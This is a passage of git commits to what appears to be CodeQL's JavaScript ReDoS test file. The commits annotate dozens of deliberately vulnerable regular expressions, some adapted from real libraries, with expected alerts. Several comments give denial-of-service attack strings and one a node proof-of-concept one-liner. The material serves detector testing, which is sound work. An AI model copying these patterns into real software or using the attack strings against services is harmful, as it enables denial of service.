/^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; -var bad8 = /^([a-z]*)*$/; -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; +var bad7 = /^([a-z]+)+$/; // $ Alert +var bad8 = /^([a-z]*)*$/; // $ Alert +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert -// NOT GOOD; attack: "[" + "][".repeat(100) + "]!" // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. @@ -279,11 +277,11 @@ var bad78 = /^(b+.)+$/; // $ Alert var good39 = /a*b/; -// All 4 bad combinations of nested * and + -var bad79 = /(a*)*b/; -var bad80 = /(a+)*b/; -var bad81 = /(a*)+b/; -var bad82 = /(a+)+b/; +// All 4 bad combinations of nested * and +) +var bad79 = /(a*)*b/; // $ Alert +var bad80 = /(a+)*b/; // $ Alert +var bad81 = /(a*)+b/; // $ Alert +var bad82 = /(a+)+b/; // $ Alert var good40 = /(a|b)+/; @@ -300,45 +298,45 @@ var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; -var bad89 = /(x*)+(?=$)/ -var bad90 = /(x*)+(?=$|y)/ +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert +var bad89 = /(x*)+(?=$)/ // $ Alert +var bad90 = /(x*)+(?=$|y)/ // $ Alert // OK - but we spuriously conclude that a rejecting suffix exists. var good44 = /([\s\S]*)+(?=$)/; var good45 = /([\s\S]*)+(?=$|y)/; var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; +var bad91 = /(foo|FOO)*bar/i; // $ Alert var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; +var bad92 = /([DE]|[de])*F/i; // $ Alert -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; -var bad94 = /(a|aa)*$/; +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert +var bad94 = /(a|aa)*$/; // $ Alert var bad95 = new RegExp( "(a" + "|" + "aa)*" + "b$" -); +); // $ Alert var bad96 = new RegExp("(" + "(c|cc)*|" + "(d|dd)*|" + "(e|ee)*" + -")f$"); +")f$"); // $ Alert var bad97 = new RegExp( "(g|gg" + - ")*h$"); + ")*h$"); // $ Alert -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; +var bad99 = /(a{1,})*b/; // $ Alert var unicode = /^\n\u0000(\u0000|.)+$/; From 266ac0963773318799a6ac9429de8b643ddf327e Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:18 +0100 Subject: [PATCH 044/115] JS: Add query iDs --- .../query-tests/Security/CWE-400/ReDoS/tst.js | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 735d45ea6cc1..6be96967a643 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -1,6 +1,6 @@ // Adapted from marked (https://github.com/markedjs/marked), which is licensed // under the MIT license; see file marked-LICENSE. -var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert - attack: "_" + "__".repeat(100) +var bad1 = /^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/; // $ Alert[js/redos] - attack: "_" + "__".repeat(100) // Adapted from marked (https://github.com/markedjs/marked), which is licensed @@ -14,7 +14,7 @@ var good2 = /(.*,)+.+/; // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert - attack: " '" + "\\\\".repeat(100) +var bad2 = /^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?/; // $ Alert[js/redos] - attack: " '" + "\\\\".repeat(100) // Adapted from lulucms2 (https://github.com/yiifans/lulucms2). @@ -25,117 +25,117 @@ var good2 = /\(\*(?:[\s\S]*?\(\*[\s\S]*?\*\))*[\s\S]*?\*\)/; // under the MIT license; see file jest-LICENSE. var good3 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/; -var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) +var bad4 = /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a/; // $ Alert[js/redos] - variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) // Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), // which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert - attack: "/" + "\\/a".repeat(100) +var bad5 = /\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)/; // $ Alert[js/redos] - attack: "/" + "\\/a".repeat(100) // Adapted from CodeMirror (https://github.com/codemirror/codemirror), // which is licensed under the MIT license; see file CodeMirror-LICENSE. -var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert - attack: "##".repeat(100) + "\na" +var bad6 = /^([\s\[\{\(]|#.*)*$/; // $ Alert[js/redos] - attack: "##".repeat(100) + "\na" var good4 = /(\r\n|\r|\n)+/; // BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; +var actuallyBad = /((?:[^"']|".*?"|'.*?')*?)([(,)]|$)/; // $ Alert[js/redos] // Adapted from Knockout (https://github.com/knockout/knockout), which is // licensed under the MIT license; see file knockout-LICENSE -var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert - attack: "a" + "[]".repeat(100) + ".b\n" +var bad6 = /^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$/i; // $ Alert[js/redos] - attack: "a" + "[]".repeat(100) + ".b\n" var good6 = /(a|.)*/; // Testing the NFA - only some of the below are detected. -var bad7 = /^([a-z]+)+$/; // $ Alert -var bad8 = /^([a-z]*)*$/; // $ Alert -var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert -var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert +var bad7 = /^([a-z]+)+$/; // $ Alert[js/redos] +var bad8 = /^([a-z]*)*$/; // $ Alert[js/redos] +var bad9 = /^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$/; // $ Alert[js/redos] +var bad10 = /^(([a-z])+.)+[A-Z]([a-z])+$/; // $ Alert[js/redos] // Adapted from Prototype.js (https://github.com/prototypejs/prototype), which // is licensed under the MIT license; see file Prototype.js-LICENSE. -var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert - attack: "[" + "][".repeat(100) + "]!" +var bad11 = /(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/; // $ Alert[js/redos] - attack: "[" + "][".repeat(100) + "]!" // Adapted from Prism (https://github.com/PrismJS/prism), which is licensed // under the MIT license; see file Prism-LICENSE. -var bad12 = /("|')(\\?.)*?\1/g; // $ Alert - attack: "'" + "\\a".repeat(100) + '"' +var bad12 = /("|')(\\?.)*?\1/g; // $ Alert[js/redos] - attack: "'" + "\\a".repeat(100) + '"' -var bad13 = /(b|a?b)*c/; // $ Alert +var bad13 = /(b|a?b)*c/; // $ Alert[js/redos] -var bad15 = /(a|aa?)*b/; // $ Alert +var bad15 = /(a|aa?)*b/; // $ Alert[js/redos] var good7 = /(.|\n)*!/; -var bad16 = /(.|\n)*!/s; // $ Alert - attack: "\n".repeat(100) + "." +var bad16 = /(.|\n)*!/s; // $ Alert[js/redos] - attack: "\n".repeat(100) + "." var good8 = /([\w.]+)*/; -var bad17 = new RegExp('(a|aa?)*b'); // $ Alert +var bad17 = new RegExp('(a|aa?)*b'); // $ Alert[js/redos] // OK - not used as regexp var good9 = '(a|aa?)*b'; -var bad18 = /(([^]|[^a])*)"/; // $ Alert +var bad18 = /(([^]|[^a])*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good10 = /([^"']+)*/g; -var bad20 = /((.|[^a])*)"/; // $ Alert +var bad20 = /((.|[^a])*)"/; // $ Alert[js/redos] var good10 = /((a|[^a])*)"/; -var bad21 = /((b|[^a])*)"/; // $ Alert +var bad21 = /((b|[^a])*)"/; // $ Alert[js/redos] -var bad22 = /((G|[^a])*)"/; // $ Alert +var bad22 = /((G|[^a])*)"/; // $ Alert[js/redos] -var bad23 = /(([0-9]|[^a])*)"/; // $ Alert +var bad23 = /(([0-9]|[^a])*)"/; // $ Alert[js/redos] -var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert +var bad24 = /(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?/; // $ Alert[js/redos] -var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert +var bad25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"/; // $ Alert[js/redos] var fix25 = /"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"\\])*)"/; // OK - fixed version of bad25 -var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert +var bad27 = /(([a-z]|[d-h])*)"/; // $ Alert[js/redos] -var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert +var bad27 = /(([^a-z]|[^0-9])*)"/; // $ Alert[js/redos] -var bad28 = /((\d|[0-9])*)"/; // $ Alert +var bad28 = /((\d|[0-9])*)"/; // $ Alert[js/redos] -var bad29 = /((\s|\s)*)"/; // $ Alert +var bad29 = /((\s|\s)*)"/; // $ Alert[js/redos] -var bad30 = /((\w|G)*)"/; // $ Alert +var bad30 = /((\w|G)*)"/; // $ Alert[js/redos] var good11 = /((\s|\d)*)"/; -var bad31 = /((\d|\w)*)"/; // $ Alert +var bad31 = /((\d|\w)*)"/; // $ Alert[js/redos] -var bad32 = /((\d|5)*)"/; // $ Alert +var bad32 = /((\d|5)*)"/; // $ Alert[js/redos] -var bad33 = /((\s|[\f])*)"/; // $ Alert +var bad33 = /((\s|[\f])*)"/; // $ Alert[js/redos] -var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert +var bad34 = /((\s|[\v]|\\v)*)"/; // $ Alert[js/redos] -var bad35 = /((\f|[\f])*)"/; // $ Alert +var bad35 = /((\f|[\f])*)"/; // $ Alert[js/redos] -var bad36 = /((\W|\D)*)"/; // $ Alert +var bad36 = /((\W|\D)*)"/; // $ Alert[js/redos] -var bad37 = /((\S|\w)*)"/; // $ Alert +var bad37 = /((\S|\w)*)"/; // $ Alert[js/redos] -var bad38 = /((\S|[\w])*)"/; // $ Alert +var bad38 = /((\S|[\w])*)"/; // $ Alert[js/redos] -var bad39 = /((1s|[\da-z])*)"/; // $ Alert +var bad39 = /((1s|[\da-z])*)"/; // $ Alert[js/redos] -var bad40 = /((0|[\d])*)"/; // $ Alert +var bad40 = /((0|[\d])*)"/; // $ Alert[js/redos] -var bad41 = /(([\d]+)*)"/; // $ Alert +var bad41 = /(([\d]+)*)"/; // $ Alert[js/redos] // OK - there is no witness in the end that could cause the regexp to not match var good12 = /(\d+(X\d+)?)+/; @@ -146,38 +146,38 @@ var good13 = /([0-9]+(X[0-9]*)?)*/; var good15 = /^([^>]+)*(>|$)/; -var bad43 = /^([^>a]+)*(>|$)/; // $ Alert +var bad43 = /^([^>a]+)*(>|$)/; // $ Alert[js/redos] -var bad44 = /(\n\s*)+$/; // $ Alert +var bad44 = /(\n\s*)+$/; // $ Alert[js/redos] -var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert +var bad45 = /^(?:\s+|#.*|\(\?#[^)]*\))*(?:[?*+]|{\d+(?:,\d*)?})/; // $ Alert[js/redos] -var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert +var bad46 = /\{\[\s*([a-zA-Z]+)\(([a-zA-Z]+)\)((\s*([a-zA-Z]+)\: ?([ a-zA-Z{}]+),?)+)*\s*\]\}/; // $ Alert[js/redos] -var bad47 = /(a+|b+|c+)*c/; // $ Alert +var bad47 = /(a+|b+|c+)*c/; // $ Alert[js/redos] -var bad48 = /(((a+a?)*)+b+)/; // $ Alert +var bad48 = /(((a+a?)*)+b+)/; // $ Alert[js/redos] -var bad49 = /(a+)+bbbb/; // $ Alert +var bad49 = /(a+)+bbbb/; // $ Alert[js/redos] var good16 = /(a+)+aaaaa*a+/; -var bad50 = /(a+)+aaaaa$/; // $ Alert +var bad50 = /(a+)+aaaaa$/; // $ Alert[js/redos] var good17 = /(\n+)+\n\n/; -var bad51 = /(\n+)+\n\n$/; // $ Alert +var bad51 = /(\n+)+\n\n$/; // $ Alert[js/redos] -var bad52 = /([^X]+)*$/; // $ Alert +var bad52 = /([^X]+)*$/; // $ Alert[js/redos] -var bad53 = /(([^X]b)+)*$/; // $ Alert +var bad53 = /(([^X]b)+)*$/; // $ Alert[js/redos] var good18 = /(([^X]b)+)*($|[^X]b)/; -var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert +var bad54 = /(([^X]b)+)*($|[^X]c)/; // $ Alert[js/redos] var good20 = /((ab)+)*ababab/; @@ -188,12 +188,12 @@ var good21 = /((ab)+)*abab(ab)*(ab)+/; var good22 = /((ab)+)*/; -var bad55 = /((ab)+)*$/; // $ Alert +var bad55 = /((ab)+)*$/; // $ Alert[js/redos] var good23 = /((ab)+)*[a1][b1][a2][b2][a3][b3]/; -var bad56 = /([\n\s]+)*(.)/; // $ Alert +var bad56 = /([\n\s]+)*(.)/; // $ Alert[js/redos] // OK - any witness passes through the accept state. var good24 = /(A*A*X)*/; @@ -201,11 +201,11 @@ var good24 = /(A*A*X)*/; var good26 = /([^\\\]]+)*/ -var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert +var bad59 = /(\w*foobarbaz\w*foobarbaz\w*foobarbaz\w*foobarbaz\s*foobarbaz\d*foobarbaz\w*)+-/; // $ Alert[js/redos] -var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert +var bad60 = /(.thisisagoddamnlongstringforstresstestingthequery|\sthisisagoddamnlongstringforstresstestingthequery)*-/ // $ Alert[js/redos] -var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert +var bad61 = /(thisisagoddamnlongstringforstresstestingthequery|this\w+query)*-/ // $ Alert[js/redos] var good27 = /(thisisagoddamnlongstringforstresstestingthequery|imanotherbutunrelatedstringcomparedtotheotherstring)*-/ @@ -218,102 +218,102 @@ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix -var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert - and a good prefix test +var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test var good30 = /(a+)*[^][^][^]?/; // GOOD - but we fail to see that repeating the attack string ends in the "accept any" state (due to not parsing the range `[^]{2,3}`). -var good31 = /(a+)*[^]{2,3}/; +var good31 = /(a+)*[^]{2,3}/; // $ Alert[js/redos] // GOOD - but we spuriously conclude that a rejecting suffix exists (due to not parsing the range `[^]{2,}` when constructing the NFA). -var good32 = /(a+)*([^]{2,}|X)$/; +var good32 = /(a+)*([^]{2,}|X)$/; // $ Alert[js/redos] var good33 = /(a+)*([^]*|X)$/; -var bad64 = /((a+)*$|[^]+)/; // $ Alert +var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; -var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert - a good prefix test +var bad65 = /(^|;)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(0|1)(e+)+f/; // $ Alert[js/redos] - a good prefix test -var bad66 = /^ab(c+)+$/; // $ Alert +var bad66 = /^ab(c+)+$/; // $ Alert[js/redos] -var bad67 = /(\d(\s+)*){20}/; // $ Alert +var bad67 = /(\d(\s+)*){20}/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good36 = /(([^/]|X)+)(\/[^]*)*$/; +var good36 = /(([^/]|X)+)(\/[^]*)*$/; // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good37 = /^((x([^Y]+)?)*(Y|$))/; +var good37 = /^((x([^Y]+)?)*(Y|$))/; // $ Alert[js/redos] -var bad68 = /(a*)+b/; // $ Alert +var bad68 = /(a*)+b/; // $ Alert[js/redos] -var bad69 = /foo([\w-]*)+bar/; // $ Alert +var bad69 = /foo([\w-]*)+bar/; // $ Alert[js/redos] -var bad70 = /((ab)*)+c/; // $ Alert +var bad70 = /((ab)*)+c/; // $ Alert[js/redos] -var bad71 = /(a?a?)*b/; // $ Alert +var bad71 = /(a?a?)*b/; // $ Alert[js/redos] var good38 = /(a?)*b/; var bad72 = /(c?a?)*b/; // $ MISSING: Alert -var bad73 = /(?:a|a?)+b/; // $ Alert +var bad73 = /(?:a|a?)+b/; // $ Alert[js/redos] var bad74 = /(a?b?)*$/; // $ MISSING: Alert -var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert +var bad76 = /PRE(([a-c]|[c-d])T(e?e?e?e?|X))+(cTcT|cTXcTX$)/; // $ Alert[js/redos] -var bad77 = /^((a)+\w)+$/; // $ MISSING: Alert +var bad77 = /^((a)+\w)+$/; // $ Alert[js/redos] -var bad78 = /^(b+.)+$/; // $ Alert +var bad78 = /^(b+.)+$/; // $ Alert[js/redos] var good39 = /a*b/; // All 4 bad combinations of nested * and +) -var bad79 = /(a*)*b/; // $ Alert -var bad80 = /(a+)*b/; // $ Alert -var bad81 = /(a*)+b/; // $ Alert -var bad82 = /(a+)+b/; // $ Alert +var bad79 = /(a*)*b/; // $ Alert[js/redos] +var bad80 = /(a+)*b/; // $ Alert[js/redos] +var bad81 = /(a*)+b/; // $ Alert[js/redos] +var bad82 = /(a+)+b/; // $ Alert[js/redos] var good40 = /(a|b)+/; var good41 = /(?:[\s;,"'<>(){}|[\]@=+*]|:(?![/\\]))+/; -var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert -var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert -var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert -var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert +var bad83 = /^((?:a{|-)|\w\{)+X$/; // $ Alert[js/redos] +var bad84 = /^((?:a{0|-)|\w\{\d)+X$/; // $ Alert[js/redos] +var bad85 = /^((?:a{0,|-)|\w\{\d,)+X$/; // $ Alert[js/redos] +var bad86 = /^((?:a{0,2|-)|\w\{\d,\d)+X$/; // $ Alert[js/redos] var bad86AndAHalf = /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/; // $ MISSING: Alert var good43 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)/g; -var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert -var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert -var bad89 = /(x*)+(?=$)/ // $ Alert -var bad90 = /(x*)+(?=$|y)/ // $ Alert +var bad87 = /("[^"]*?"|[^"\s]+)+(?=\s*|\s*$)X/g; // $ Alert[js/redos] +var bad88 = /("[^"]*?"|[^"\s]+)+(?=X)/g; // $ Alert[js/redos] +var bad89 = /(x*)+(?=$)/ // $ Alert[js/redos] +var bad90 = /(x*)+(?=$|y)/ // $ Alert[js/redos] // OK - but we spuriously conclude that a rejecting suffix exists. -var good44 = /([\s\S]*)+(?=$)/; -var good45 = /([\s\S]*)+(?=$|y)/; +var good44 = /([\s\S]*)+(?=$)/; // $ Alert[js/redos] +var good45 = /([\s\S]*)+(?=$|y)/; // $ Alert[js/redos] var good46 = /(foo|FOO)*bar/; -var bad91 = /(foo|FOO)*bar/i; // $ Alert +var bad91 = /(foo|FOO)*bar/i; // $ Alert[js/redos] var good47 = /([AB]|[ab])*C/; -var bad92 = /([DE]|[de])*F/i; // $ Alert +var bad92 = /([DE]|[de])*F/i; // $ Alert[js/redos] -var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert -var bad94 = /(a|aa)*$/; // $ Alert +var bad93 = /(?<=^v?|\sv?)(a|aa)*$/; // $ Alert[js/redos] +var bad94 = /(a|aa)*$/; // $ Alert[js/redos] var bad95 = new RegExp( "(a" + @@ -330,16 +330,16 @@ var bad96 = new RegExp("(" + var bad97 = new RegExp( "(g|gg" + - ")*h$"); // $ Alert + ")*h$"); // $ Alert[js/redos] -var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert +var bad98 = /^(?:\*\/\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}\/(?:\*|[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126})(?:\s* *; *[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}(?:="?[a-zA-Z0-9][a-zA-Z0-9!\#\$&\-\^_\.\+]{0,126}"?)?\s*)*)$/; // $ Alert[js/redos] var good48 = /(\/(?:\/[\w.-]*)*){0,1}:([\w.-]+)/; -var bad99 = /(a{1,})*b/; // $ Alert +var bad99 = /(a{1,})*b/; // $ Alert[js/redos] -var unicode = /^\n\u0000(\u0000|.)+$/; +var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] -var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); +var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] var unicodeSets = /(aa?)*b/v; From 1fcebcec8716a213439b810f5d268556e79b97e8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:29:35 +0100 Subject: [PATCH 045/115] JS: Move some ReDoS alerts --- .../ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 6be96967a643..c2f83ed25aee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -319,14 +319,14 @@ var bad95 = new RegExp( "(a" + "|" + "aa)*" + - "b$" -); // $ Alert + "b$" // $ Alert[js/redos] +); var bad96 = new RegExp("(" + - "(c|cc)*|" + - "(d|dd)*|" + + "(c|cc)*|" + // $ Alert[js/redos] + "(d|dd)*|" + // $ Alert[js/redos] "(e|ee)*" + -")f$"); // $ Alert +")f$"); // $ Alert[js/redos] var bad97 = new RegExp( "(g|gg" + From a0f8e287907732be0383d21ca86178b3d904273f Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:15 +0100 Subject: [PATCH 046/115] JS: Accept a fixed FN --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c2f83ed25aee..53385682867a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -216,7 +216,7 @@ var good28 = /foo([\uDC66\uDC67]|[\uDC68\uDC69])*foo/ var good29 = /foo((\uDC66|\uDC67)|(\uDC68|\uDC69))*foo/ -var bad62 = /a{2,3}(b+)+X/; // $ MISSING: Alert - cannot currently construct a prefix +var bad62 = /a{2,3}(b+)+X/; // $ Alert[js/redos] var bad63 = /^<(\w+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/; // $ Alert[js/redos] - and a good prefix test From cded75766f8c5b878358f9bf79888010a7533b41 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 14:30:32 +0100 Subject: [PATCH 047/115] JS: Add a query ID --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index 